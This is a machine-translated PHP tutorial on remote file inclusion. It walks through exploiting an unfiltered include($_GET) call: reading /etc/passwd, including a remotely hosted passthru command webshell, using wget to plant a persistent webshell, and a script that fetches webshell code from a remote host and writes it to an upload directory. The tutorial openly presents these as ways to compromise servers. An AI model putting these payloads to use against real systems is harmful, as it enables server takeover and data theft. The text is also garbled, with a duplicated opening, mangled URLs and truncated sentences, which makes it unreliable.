First, let's discuss the file inclusion vulnerability. The first question is, what is the remote file inclusion vulnerability & quot ;? The answer is: when the server uses the php feature (function) to include any file, the source of the file to be included is not strictly filtered, so it can contain a malicious file, however, we can construct this malicious file to achieve evil purposes. First, let's discuss the file inclusion vulnerability. The first question is, what is "remote file inclusion vulnerability "? The answer is: when the server uses the php feature (function) to include any file, the source of the file to be included is not strictly filtered, so it can contain a malicious file, however, we can construct this malicious file to achieve evil purposes.
Almost all cgi programs have such bugs, but the specific expressions are different.
I. involved dangerous functions (include (), require () and include_once (), require_once ()〕
Include () & require () statement: includes and runs the specified file.
These two structures are identical except for how to handle failures. Include () generates a warning and require () causes a fatal error. In other words, if you want to stop processing the page when a file is lost, use require (). This is not the case with include (). The script will continue to run.
If "allow_url_fopen" is activated in PHP (configured by default), you can also use URL (through HTTP or other supported encapsulation protocols) instead of local files to specify the files to be included. If the target server interprets the target file as PHP code, you can use the URL request string applicable to http get to pass variables to the included file.
For details, refer :#
Require_once () & amp; include_once ()
The require_once () and include_once () statements include and run the specified file during script execution. This behavior is similar to the require () statement. The only difference is that if the code in the file has been included, it will not be included again. It is applicable to situations where the same file may be included more than once during script execution. you want to ensure that it is included only once to avoid function redefinition and variable re-assignment.
For details, refer :#
II. why File inclusion?
When programmers write programs, they do not like to do the same thing or write the same code (such as some common functions) several times, therefore, the public code is written in a separate file, such as share. php, and then include the call in other files. In php, we use the functions listed above to achieve this goal. the workflow is as follows. php contains share. php, I will write include ("share. php ") to achieve the goal, and then you can use share. php functions, such as the name of the file that needs to be written to death, have no problems or vulnerabilities. So what exactly is the problem?
Sometimes you may not be sure which file to include. for example, let's look at the index. php code of the file below:
The code is as follows:
if ($_GET) { include $_GET; } else { include "home.php"; }
A piece of PHP code is normal. how does it work? This involves the meaning of $ _ GET, so I won't talk about it (or I can write an HTTP article). If you still don't know GET, POST, and so on, then you need to make up some relevant information on Google.
The above code may be in the following format: # or http: // www.jb51.net/php/index.php? Page = downloads. php:
1. submit the URL above and GET the value of this page ($ _ GET) in index. php ).
2. check whether $ _ GET is empty. if it is not empty (main. php here), use include to include the file.
3. if $ _ GET is empty, run else to include the home. php file.
III. why are vulnerabilities discovered?
You may want to say that this is good. it is very convenient to dynamically include files according to URLs. how can this cause a vulnerability? The answer to the question is: we are not clever, we always like to be different from others, we will not follow his link to operate, we may want to write their own files to contain (call, for example, we will randomly enter the following URL: http: // www.jb51.net/php/index.php? Page = hello. php. Then our index. the php program is silly and follows the steps above to execute: Get page as hello. php, and then go to include (hello. php), then the problem occurs, because we do not have hello. php file, so it will report a warning when it is included, similar to the following information:
Quote: Warning: include(hello.php) [function.include]: failed to open stream: No such file or directory in /vhost/php/index.php on line 3 Warning: include() [function.include]: Failed opening 'hello.php' for inclusion (include_path='.:') in /vhost/php/index.php on line 3
Note that the preceding Warning cannot find the specified hello. the PHP file, that is, the file that does not contain the specified path. the following warning is that the specified file is not found before, so a warning is given when the file is included.
IV. how to use
As we can see above, there is a problem, so how can we use such a vulnerability? there are actually a lot of exploitation methods, but they are essentially similar. here I will talk about three common exploitation methods:
1. including reading other files on the target machine
As we can see above, because the obtained parameter page is not filtered, we can randomly specify other sensitive files on the target host, such as in the previous warning, we can see the exposed absolute path (vhost/php/), so we can detect multiple times to include other files, such as specifying the URL as: http: // www.jb51.net/php/index.php? Page =. /txt.txt can be used to read the txt file from the current directory .. /.. /perform directory jump (without filtering .. /). You can also directly specify an absolute path to read sensitive system files, such as the URL: http: // www.jb51.net/php/index.php? Page =/etc/passwd. if the target host does not have strict permission restrictions, or the Apache startup permission is relatively high, you can read the content of this file. Otherwise, a Warning similar to open_basedir restriction in effect. will be obtained.
2. include a runable PHP Trojan
If the target host's "allow_url_fopen" suffix (the suffix is not important, as long as the content is in PHP format ).
CODE: [Copy to clipboard]
--------------------------------------------------------------------------------
If (get_magic_quotes_gpc () {$ _ REQUEST ["cmd"] = stripslashes ($ _ REQUEST ["cmd"]);} // remove the escape character (the backslash character in the string can be removed) ini_set ("max_execution_time", 0); // set the execution time for this file. 0 is unlimited. echo "1. s.T "; // Print the returned start line prompt passthru ($ _ REQUEST [" cmd "]); // run the command echo" 1. s.T "; // The Returned end row prompt?>
The purpose of the above file is to accept the command specified by cmd and call the passthru function for execution to return the content between 1. S.T. Save this file to the server on our host (it can be a host that does not support PHP), as long as it can be accessed through HTTP, for example, the address is as follows: http: // www.jb51.net/#.txt, then we can construct the following URL on the vulnerable host to use: http: // www.jb51.net/php/index.php? Page = #. the command to be executed is followed by cmd. other commonly used commands (take * UNIX as an example) are as follows:
Quote:
Ll column directory and File (equivalent to dir in Windows)
Pwd to view the current absolute path
Id whoami view current user
Wget downloads the file of the specified URL
Wait for others. go to BAIDU to find the host.
The above method is to get a Webshell (although this php file is not on the target machine, it is indeed a Webshell, isn't it? Haha)
3. a php file containing the created File
Some people may think that it is more reassuring to get a real Webshell on the target machine. if someone finds that the vulnerability is fixed, we can no longer remotely include the "pseudo" Webshell above, right? We can understand this mentality. let's continue. To get a real Webshell, we also talk about two common methods:
1) use commands such as wget to download a Webshell
This is simple and often used. in the pseudo webshell we obtained above, we can execute commands, so we can also call a very powerful role in the system, wget, this command is powerful. you can use google to get a lot of parameters, and it will definitely confuse you. haha, we don't need to be so complicated. we will use a-O (-- output-document = FILE, write the document to the FILE.
The premise is that you put a Webshell containing PHP code in a place that can be accessed through HTTP or FTP, such as http: // www.jb51.net/1stphp.txt, this file contains the content of Webshell. Then, run the following URL in the pseudo Webshell: #: // www.jb51.net/#.txt? Cmd = wget #-O 1stphp. php. if the current directory is writable, you can get a Webshell named 1stphp. php. if the current directory is not writable, you need to find another method.
2) use files to create
The previous wget may encounter a situation where the current directory cannot be written; or the command is disabled (or not installed) on the target host, and we need to modify it again, we can combine the previous file inclusion vulnerability to include a PHP script for creating a file (writing a file). The content is as follows:
CODE: [Copy to clipboard]
--------------------------------------------------------------------------------
$ F = file_get_contents ("http://www.jb51.net/1stphp.txt"); // open the file stream in the specified path $ ff = fopen (". /upload/1st. php "," a "); // you can find a directory and create a file fwrite ($ ff, $ f ); // write the previously opened file stream to the created file fclose ($ ff); // Close and save the file?>
Or write the PHP file we downloaded with wget, but we improved the method and implemented it with the php script. can we use the above cmd. PHP? Cmd = ll: Find the writable directory, for example, upload, and create the file under this directory:./upload/1st. php. Then we can get our Webshell.
V. Post
In fact, we can end this topic here. In the end, let's talk a few more times. The File Inclusion vulnerability is basically a simple vulnerability with a high level of crisis, there are still many systems. if you are careful, you can find a lot. The process is flexible to use. you must be good at problem analysis and find a solution to the problem, so that you can make progress.
The vulnerability involves a lot of knowledge and cannot be involved in one by one. You are welcome to ask questions, or you can solve it yourself on Google. Time is in a hurry. I hope you can correct the description!
Finally, it takes more time to practice such things. I will find a specific example to repeat this process to give you a deep understanding; you can also look for the vulnerabilities you have discovered and want to share the detailed analysis and utilization process with you! 1st wish you progress
The above is the php remote file vulnerability analysis _ php skills. For more information, see PHP Chinese network (www.php1.cn )!